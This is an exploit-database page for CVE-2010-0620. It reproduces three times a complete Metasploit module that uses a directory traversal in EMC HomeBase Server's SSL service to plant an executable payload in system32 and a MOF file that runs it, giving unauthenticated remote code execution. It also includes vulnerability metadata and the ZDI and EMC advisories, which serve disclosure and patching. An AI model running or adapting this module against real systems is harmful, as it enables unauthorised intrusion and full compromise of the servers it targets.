EMC HomeBase Server Directory Traversal Remote Code Execution
2011-04-27T00:00:00
ID EDB-ID:17219 Type exploitdb Reporter metasploit Modified 2011-04-27T00:00:00
Description
EMC HomeBase Server Directory Traversal Remote Code Execution. CVE-2010-0620. Remote exploit for windows platform
##
# $Id: emc_homebase_exec.rb 12458 2011-04-27 20:29:27Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC HomeBase Server Directory Traversal Remote Code Execution',
'Description' => %q{
This module exploits a directory traversal and remote code execution
flaw in EMC HomeBase Server 6.3.0.
Note: This module has only been tested against Windows XP SP3 and Windows 2003 SP2
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 12458 $',
'References' =>
[
[ 'CVE', '2010-0620' ],
[ 'BID', '38380' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-020/' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 23 2010'))
register_options(
[
Opt::RPORT(18821),
OptBool.new('SSL', [true, 'Use SSL', true]),
], self.class)
end
def exploit
name = exe_name()
exe_upload(name)
select(nil,nil,nil,2)
mof_upload(name)
select(nil,nil,nil,4)
handler
end
def exe_name
rand_text_alpha_upper(8) + ".exe"
end
def exe_upload(exe_name)
# this uploads our final exe payload.
data = generate_payload_exe
exe_dir = "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\WINDOWS\\\\system32\\\\"
connect
banner = sock.get
if ( banner =~ /EMC HomeBase HomebaseSSL Service/ )
print_good("EMC HomeBase HomebaseSSL Service Detected!")
print_status("Sending exe payload '#{exe_name}'...")
sock.put("DATA #{exe_dir}#{exe_name} #{data.length}\r\n")
ready = sock.get
if ( ready =~ /150 Ready to Recieve Data/ )
print_good("#{ready.strip}")
print_status("Sending '#{data.length}' bytes of data...")
sock.put(data)
complete = sock.get
if ( complete =~ /226 Data Complete/ )
print_good("#{complete.strip}")
print_status("Sending 'QUIT")
sock.put("quit\r\n")
return
end
else
print_error("Something went wrong...")
return
end
else
print_error("Not a EMC HomeBaseSSL Service")
return
end
disconnect
end
def mof_upload(exe_name)
# this is what runs our uploaded exe payload.
mof_name = rand_text_alphanumeric(8+rand(8))
mof = generate_mof(mof_name, exe_name)
mof_dir = "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\WINDOWS\\\\system32\\\\wbem\\\\mof\\\\"
connect
banner = sock.get
if ( banner =~ /EMC HomeBase HomebaseSSL Service/ )
print_good("EMC HomeBase HomebaseSSL Service Detected!")
print_status("Sending MOF file '#{mof_name}'...")
sock.put("DATA #{mof_dir}#{mof_name} #{mof.length}\r\n")
ready = sock.get
if ( ready =~ /150 Ready to Recieve Data/ )
print_good("#{ready.strip}")
print_status("Sending '#{mof.length}' bytes of data...")
sock.put(mof)
complete = sock.get
if ( complete =~ /226 Data Complete/ )
print_good("#{complete.strip}")
print_status("Sending 'QUIT")
sock.put("quit\r\n")
return
end
else
print_error("Something went wrong...")
return
end
else
print_error("Not a EMC HomeBaseSSL Service")
return
end
disconnect
end
end
{"id": "EDB-ID:17219", "type": "exploitdb", "bulletinFamily": "exploit", "title": "EMC HomeBase Server Directory Traversal Remote Code Execution", "description": "EMC HomeBase Server Directory Traversal Remote Code Execution. CVE-2010-0620. Remote exploit for windows platform", "published": "2011-04-27T00:00:00", "modified": "2011-04-27T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/17219/", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2010-0620"], "lastseen": "2016-02-02T07:27:18", "viewCount": 3, "enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2016-02-02T07:27:18", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-0620"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10646", "SECURITYVULNS:DOC:23284", "SECURITYVULNS:DOC:23283"]}, {"type": "zdi", "idList": ["ZDI-10-020"]}, {"type": "d2", "idList": ["D2SEC_HOMEBASE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:100917"]}], "modified": "2016-02-02T07:27:18", "rev": 2}, "vulnersScore": 8.4}, "sourceHref": "https://www.exploit-db.com/download/17219/", "sourceData": "##\r\n# $Id: emc_homebase_exec.rb 12458 2011-04-27 20:29:27Z mc $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::EXE\r\n\tinclude Msf::Exploit::WbemExec\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'EMC HomeBase Server Directory Traversal Remote Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a directory traversal and remote code execution\r\n\t\t\t\tflaw in EMC HomeBase Server 6.3.0.\r\n\r\n\t\t\t\tNote: This module has only been tested against Windows XP SP3 and Windows 2003 SP2 \r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 12458 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-0620' ],\r\n\t\t\t\t\t[ 'BID', '38380' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-020/' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2048,\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', { } ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Feb 23 2010'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(18821),\r\n\t\t\t\tOptBool.new('SSL', [true, 'Use SSL', true]),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tname = exe_name()\r\n\t\texe_upload(name)\r\n\t\tselect(nil,nil,nil,2)\r\n\t\tmof_upload(name)\r\n\t\tselect(nil,nil,nil,4)\r\n\t\thandler\r\n\r\n\tend\r\n\r\n\tdef exe_name\r\n\r\n\t\trand_text_alpha_upper(8) + \".exe\"\r\n\r\n\tend\r\n\r\n\tdef exe_upload(exe_name)\r\n\r\n\t\t# this uploads our final exe payload.\r\n\r\n\t\tdata = generate_payload_exe\r\n\t\texe_dir = \"/..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\WINDOWS\\\\\\\\system32\\\\\\\\\"\r\n\t\r\n\t\tconnect\r\n\r\n\t\tbanner = sock.get\r\n\t\t\tif ( banner =~ /EMC HomeBase HomebaseSSL Service/ )\r\n\t\t\t\tprint_good(\"EMC HomeBase HomebaseSSL Service Detected!\")\r\n\t\t\t\tprint_status(\"Sending exe payload '#{exe_name}'...\")\r\n\t\t\t\tsock.put(\"DATA #{exe_dir}#{exe_name} #{data.length}\\r\\n\")\r\n\t\t\t\tready = sock.get\r\n\t\t\t\t\tif ( ready =~ /150 Ready to Recieve Data/ )\r\n\t\t\t\t\t\tprint_good(\"#{ready.strip}\")\r\n\t\t\t\t\t\tprint_status(\"Sending '#{data.length}' bytes of data...\")\r\n\t\t\t\t\t\tsock.put(data)\r\n\t\t\t\t\t\tcomplete = sock.get\r\n\t\t\t\t\t\tif ( complete =~ /226 Data Complete/ )\r\n\t\t\t\t\t\t\tprint_good(\"#{complete.strip}\")\r\n\t\t\t\t\t\t\tprint_status(\"Sending 'QUIT\")\r\n\t\t\t\t\t\t\tsock.put(\"quit\\r\\n\")\r\n\t\t\t\t\t\t\treturn\r\n\t\t\t\t\t\tend\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\tprint_error(\"Something went wrong...\")\r\n\t\t\t\t\t\treturn\r\n\t\t\t\t\tend\r\n\t\t\telse \r\n\t\t\t\tprint_error(\"Not a EMC HomeBaseSSL Service\")\r\n\t\t\t\treturn\r\n\t\t\tend\r\n\t\t\r\n\t\tdisconnect\r\n\r\n\tend\r\n\r\n\tdef mof_upload(exe_name)\r\n\r\n\t\t# this is what runs our uploaded exe payload.\r\n\r\n\t\tmof_name = rand_text_alphanumeric(8+rand(8))\r\n\t\tmof = generate_mof(mof_name, exe_name)\r\n\t\tmof_dir = \"/..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\WINDOWS\\\\\\\\system32\\\\\\\\wbem\\\\\\\\mof\\\\\\\\\"\r\n\r\n\t\tconnect\r\n\r\n\t\tbanner = sock.get\r\n\t\t\tif ( banner =~ /EMC HomeBase HomebaseSSL Service/ )\r\n\t\t\t\tprint_good(\"EMC HomeBase HomebaseSSL Service Detected!\")\r\n\t\t\t\tprint_status(\"Sending MOF file '#{mof_name}'...\")\r\n\t\t\t\tsock.put(\"DATA #{mof_dir}#{mof_name} #{mof.length}\\r\\n\")\r\n\t\t\t\tready = sock.get\r\n\t\t\t\t\tif ( ready =~ /150 Ready to Recieve Data/ )\r\n\t\t\t\t\t\tprint_good(\"#{ready.strip}\")\r\n\t\t\t\t\t\tprint_status(\"Sending '#{mof.length}' bytes of data...\")\r\n\t\t\t\t\t\tsock.put(mof)\r\n\t\t\t\t\t\tcomplete = sock.get\r\n\t\t\t\t\t\t\tif ( complete =~ /226 Data Complete/ )\r\n\t\t\t\t\t\t\t\tprint_good(\"#{complete.strip}\")\r\n\t\t\t\t\t\t\t\tprint_status(\"Sending 'QUIT\")\r\n\t\t\t\t\t\t\t\tsock.put(\"quit\\r\\n\")\r\n\t\t\t\t\t\t\t\treturn\r\n\t\t\t\t\t\t\tend\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\tprint_error(\"Something went wrong...\")\r\n\t\t\t\t\t\treturn\r\n\t\t\t\t\tend\r\n\t\t\telse\r\n\t\t\t\tprint_error(\"Not a EMC HomeBaseSSL Service\")\r\n\t\t\t\treturn\r\n end\r\n\r\n\t\tdisconnect\r\n\r\n\tend\r\nend\r\n", "osvdbidlist": []}
{"cve": [{"lastseen": "2020-10-03T11:57:22", "description": "Directory traversal vulnerability in the SSL Service in EMC HomeBase Server 6.2.x before 6.2.3 and 6.3.x before 6.3.2 allows remote attackers to overwrite arbitrary files with any content, and consequently execute arbitrary code, via a .. (dot dot) in an unspecified parameter.\nPer: http://seclists.org/bugtraq/2010/Feb/222\r\n\r\nAffected products:\r\n\r\nEMC HomeBase Server version 6.2.x\r\n\r\nEMC HomeBase Server version 6.3.x\r\n", "edition": 3, "cvss3": {}, "published": "2010-02-25T00:30:00", "title": "CVE-2010-0620", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0620"], "modified": "2018-10-10T19:53:00", "cpe": ["cpe:/a:emc:homebase_server:6.2", "cpe:/a:emc:homebase_server:6.3"], "id": "CVE-2010-0620", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0620", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:emc:homebase_server:6.2:*:*:*:*:*:*:*", "cpe:2.3:a:emc:homebase_server:6.3:*:*:*:*:*:*:*"]}], "d2": [{"lastseen": "2019-05-29T17:19:05", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0620"], "description": "**Name**| d2sec_homebase \n---|--- \n**CVE**| CVE-2010-0620 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| EMC HomeBase SSL Service Arbitrary File Upload Remote Code Execution Vulnerability \n**Notes**| \n", "edition": 2, "modified": "2010-02-25T00:30:00", "published": "2010-02-25T00:30:00", "id": "D2SEC_HOMEBASE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_homebase", "title": "DSquare Exploit Pack: D2SEC_HOMEBASE", "type": "d2", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:43", "description": "", "published": "2011-04-28T00:00:00", "type": "packetstorm", "title": "EMC HomeBase Server Directory Traversal Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0620"], "modified": "2011-04-28T00:00:00", "id": "PACKETSTORM:100917", "href": "https://packetstormsecurity.com/files/100917/EMC-HomeBase-Server-Directory-Traversal-Remote-Code-Execution.html", "sourceData": "`## \n# $Id: emc_homebase_exec.rb 12458 2011-04-27 20:29:27Z mc $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::WbemExec \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'EMC HomeBase Server Directory Traversal Remote Code Execution', \n'Description' => %q{ \nThis module exploits a directory traversal and remote code execution \nflaw in EMC HomeBase Server 6.3.0. \n \nNote: This module has only been tested against Windows XP SP3 and Windows 2003 SP2 \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 12458 $', \n'References' => \n[ \n[ 'CVE', '2010-0620' ], \n[ 'BID', '38380' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-020/' ], \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'InitialAutoRunScript' => 'migrate -f', \n}, \n'Payload' => \n{ \n'Space' => 2048, \n'DisableNops' => true, \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', { } ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Feb 23 2010')) \n \nregister_options( \n[ \nOpt::RPORT(18821), \nOptBool.new('SSL', [true, 'Use SSL', true]), \n], self.class) \nend \n \ndef exploit \n \nname = exe_name() \nexe_upload(name) \nselect(nil,nil,nil,2) \nmof_upload(name) \nselect(nil,nil,nil,4) \nhandler \n \nend \n \ndef exe_name \n \nrand_text_alpha_upper(8) + \".exe\" \n \nend \n \ndef exe_upload(exe_name) \n \n# this uploads our final exe payload. \n \ndata = generate_payload_exe \nexe_dir = \"/..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\WINDOWS\\\\\\\\system32\\\\\\\\\" \n \nconnect \n \nbanner = sock.get \nif ( banner =~ /EMC HomeBase HomebaseSSL Service/ ) \nprint_good(\"EMC HomeBase HomebaseSSL Service Detected!\") \nprint_status(\"Sending exe payload '#{exe_name}'...\") \nsock.put(\"DATA #{exe_dir}#{exe_name} #{data.length}\\r\\n\") \nready = sock.get \nif ( ready =~ /150 Ready to Recieve Data/ ) \nprint_good(\"#{ready.strip}\") \nprint_status(\"Sending '#{data.length}' bytes of data...\") \nsock.put(data) \ncomplete = sock.get \nif ( complete =~ /226 Data Complete/ ) \nprint_good(\"#{complete.strip}\") \nprint_status(\"Sending 'QUIT\") \nsock.put(\"quit\\r\\n\") \nreturn \nend \nelse \nprint_error(\"Something went wrong...\") \nreturn \nend \nelse \nprint_error(\"Not a EMC HomeBaseSSL Service\") \nreturn \nend \n \ndisconnect \n \nend \n \ndef mof_upload(exe_name) \n \n# this is what runs our uploaded exe payload. \n \nmof_name = rand_text_alphanumeric(8+rand(8)) \nmof = generate_mof(mof_name, exe_name) \nmof_dir = \"/..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\WINDOWS\\\\\\\\system32\\\\\\\\wbem\\\\\\\\mof\\\\\\\\\" \n \nconnect \n \nbanner = sock.get \nif ( banner =~ /EMC HomeBase HomebaseSSL Service/ ) \nprint_good(\"EMC HomeBase HomebaseSSL Service Detected!\") \nprint_status(\"Sending MOF file '#{mof_name}'...\") \nsock.put(\"DATA #{mof_dir}#{mof_name} #{mof.length}\\r\\n\") \nready = sock.get \nif ( ready =~ /150 Ready to Recieve Data/ ) \nprint_good(\"#{ready.strip}\") \nprint_status(\"Sending '#{mof.length}' bytes of data...\") \nsock.put(mof) \ncomplete = sock.get \nif ( complete =~ /226 Data Complete/ ) \nprint_good(\"#{complete.strip}\") \nprint_status(\"Sending 'QUIT\") \nsock.put(\"quit\\r\\n\") \nreturn \nend \nelse \nprint_error(\"Something went wrong...\") \nreturn \nend \nelse \nprint_error(\"Not a EMC HomeBaseSSL Service\") \nreturn \nend \n \ndisconnect \n \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/100917/emc_homebase_exec.rb.txt"}], "zdi": [{"lastseen": "2020-06-22T11:40:59", "bulletinFamily": "info", "cvelist": ["CVE-2010-0620"], "edition": 3, "description": "This vulnerability allows remote attackers to upload arbitrary files on vulnerable installations of EMC HomeBase Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the HomeBase SSL Service due to a failure to sanitize '../' directory traversal modifiers from a parameter. This will allow a user to specify any filename to upload arbitrary contents into. Successful exploitation can result in code execution under the context of the service.", "modified": "2010-06-22T00:00:00", "published": "2010-02-23T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-10-020/", "id": "ZDI-10-020", "title": "EMC HomeBase SSL Service Arbitrary File Upload Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:33", "bulletinFamily": "software", "cvelist": ["CVE-2010-0620"], "description": "ESA-2010-003: EMC HomeBase Server Arbitrary File Upload Vulnerability\r\n\r\n\r\nIdentifier: ESA-2010-003\r\n\r\nIdentifier: HB6042\r\n\r\n \r\nCVE Identifier: CVE-2010-0620\r\n\r\n \r\nSeverity Rating: CVSS v2 Base Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)\r\n\r\n \r\nAffected products:\r\n\r\nEMC HomeBase Server version 6.2.x\r\n\r\nEMC HomeBase Server version 6.3.x\r\n\r\n \r\nVulnerability Summary: \r\n\r\nEMC HomeBase Server contains a vulnerability that may allow an\r\n\r\nunauthenticated remote user to upload arbitrary files on the affected\r\n\r\nHomeBase Server.\r\n \r\n\r\nVulnerability Details: \r\n\r\nA flaw exists within the HomeBase SSL Service that may be exploited by\r\n\r\nunauthenticated remote user to upload arbitrary files on the affected\r\n\r\nHomeBase Server. Successful exploitation may result in code execution\r\n\r\nunder the context of the service.\r\n\r\n \r\nProblem Resolution: \r\n\r\nThe following EMC HomeBase products contain resolutions to this issue:\r\n\r\n. EMC HomeBase 6.2.3 Server\r\n\r\n. EMC HomeBase 6.3.2 Server\r\n\r\n \r\n\r\nEMC strongly recommends all customers upgrade to latest versions of the\r\n\r\nproducts, which contain the resolution to this issue, at the earliest\r\n\r\nopportunity.\r\n\r\n \r\n\r\nLink to remedies: \r\n\r\nRegistered EMC Powerlink customers can download software from Powerlink.\r\n\r\nFor HomeBase Software navigate in Powerlink to Home > Support > Software\r\n\r\nDownloads and Licensing > Downloads E-I > HomeBase.\r\n\r\n. HomeBase Server 6.2.3. Download the binaries for the\r\nappropriate\r\n\r\noperating system from the section HomeBase 6.2 SP3. This includes\r\nSecurity\r\n\r\nVulnerability HB6042\r\n\r\n. HomeBase Server 6.3.2. Download the binaries for the\r\nappropriate\r\n\r\noperating system from the section HomeBase 6.3 SP2. This includes\r\nSecurity\r\n\r\nVulnerability HB6042\r\n\r\n \r\n\r\nBecause the view is restricted based on customer agreements, you may not\r\n\r\nhave permission to view certain downloads. Should you not see a software\r\n\r\ndownload you believe you should have access to, follow the instructions\r\nin\r\n\r\nEMC Knowledgebase solution emc116045. \r\n\r\n \r\n\r\nCredits: \r\n\r\nEMC would like to thank Stephen Fewer of Harmony Security\r\n\r\n(www.harmonysecurity.com) and TippingPoint Zero Day Initiative\r\n\r\n(http://zerodayinitiative.com) for discovering and reporting this issue.\r\n\r\n \r\n\r\nFor explanation of Severity Ratings, refer to EMC Knowledgebase solution\r\n\r\nemc218831.\r\n\r\n \r\n\r\nRead and utilize the information in this product alert to assist in\r\n\r\navoiding any situation that might arise from the problems described\r\nherein.\r\n\r\nIf you have any questions regarding this product alert, contact EMC\r\n\r\nSoftware Technical Support at 1-877-534-2867.\r\n\r\n \r\n\r\nAlso, refer to the release supplements for each product for information\r\n\r\nregarding the new Software packages, build information, and fixes that\r\nmay\r\n\r\nbe included in addition to the security vulnerability fix at Powerlink.\r\n\r\nFrom the Powerlink home page menu bar, select Support > Technical\r\n\r\nDocumentation and Advisories > Software E-I Documentation > HomeBase\r\n\r\n \r\n\r\nEMC Corporation distributes EMC Security Advisories in order to bring to\r\n\r\nthe attention of users of the affected EMC products important security\r\n\r\ninformation. EMC recommends all users determine the applicability of\r\nthis\r\n\r\ninformation to their individual situations and take appropriate action.\r\nThe\r\n\r\ninformation set forth herein is provided "as is" without warranty of any\r\n\r\nkind. EMC disclaims all warranties, either express or implied, including\r\n\r\nthe warranties of merchantability, fitness for a particular purpose,\r\ntitle\r\n\r\nand non-infringement. In no event shall EMC or its suppliers be liable\r\nfor\r\n\r\nany damages whatsoever including direct, indirect, incidental,\r\n\r\nconsequential, loss of business profits or special damages, even if EMC\r\nor\r\n\r\nits suppliers have been advised of the possibility of such damages. Some\r\n\r\nstates do not allow the exclusion or limitation of liability for\r\n\r\nconsequential or incidental damages so the foregoing limitation may not\r\n\r\napply.\r\n\r\n \r\n\r\nEMC Product Security Response Center\r\n\r\nSecurity_Alert@EMC.com\r\n\r\nhttp://www.emc.com/contact-us/contact/product-security-response-center.h\r\ntm", "edition": 1, "modified": "2010-02-25T00:00:00", "published": "2010-02-25T00:00:00", "id": "SECURITYVULNS:DOC:23284", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23284", "title": "ESA-2010-003: EMC HomeBase Server Arbitrary File Upload Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:35", "bulletinFamily": "software", "cvelist": ["CVE-2010-0620"], "description": "Directory traversal via SSL services.", "edition": 1, "modified": "2010-02-25T00:00:00", "published": "2010-02-25T00:00:00", "id": "SECURITYVULNS:VULN:10646", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10646", "title": "EMC HomeBase Server directory traversal", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:33", "bulletinFamily": "software", "cvelist": ["CVE-2010-0620"], "description": "ZDI-10-020: EMC HomeBase SSL Service Arbitrary File Upload Remote Code Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-020\r\nFebruary 23, 2010\r\n\r\n-- CVE ID:\r\nCVE-2010-0620\r\n\r\n-- Affected Vendors:\r\nEMC\r\n\r\n-- Affected Products:\r\nEMC HomeBase Server\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to upload arbitrary files on\r\nvulnerable installations of EMC HomeBase Server. Authentication is not\r\nrequired to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the HomeBase SSL Service due to a\r\nfailure to sanitize '../' directory traversal modifiers from a\r\nparameter. This will allow a user to specify any filename to upload\r\narbitrary contents into. Successful exploitation can result in code\r\nexecution under the context of the service.\r\n\r\n-- Vendor Response:\r\nEMC states:\r\nEMC has released a Security Alert (ESA) identifier to customers through\r\nPowerlink.\r\n\r\n-- Disclosure Timeline:\r\n2009-12-10 - Vulnerability reported to vendor\r\n2010-02-23 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Stephen Fewer of Harmony Security (www.harmonysecurity.com)\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/", "edition": 1, "modified": "2010-02-25T00:00:00", "published": "2010-02-25T00:00:00", "id": "SECURITYVULNS:DOC:23283", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23283", "title": "ZDI-10-020: EMC HomeBase SSL Service Arbitrary File Upload Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
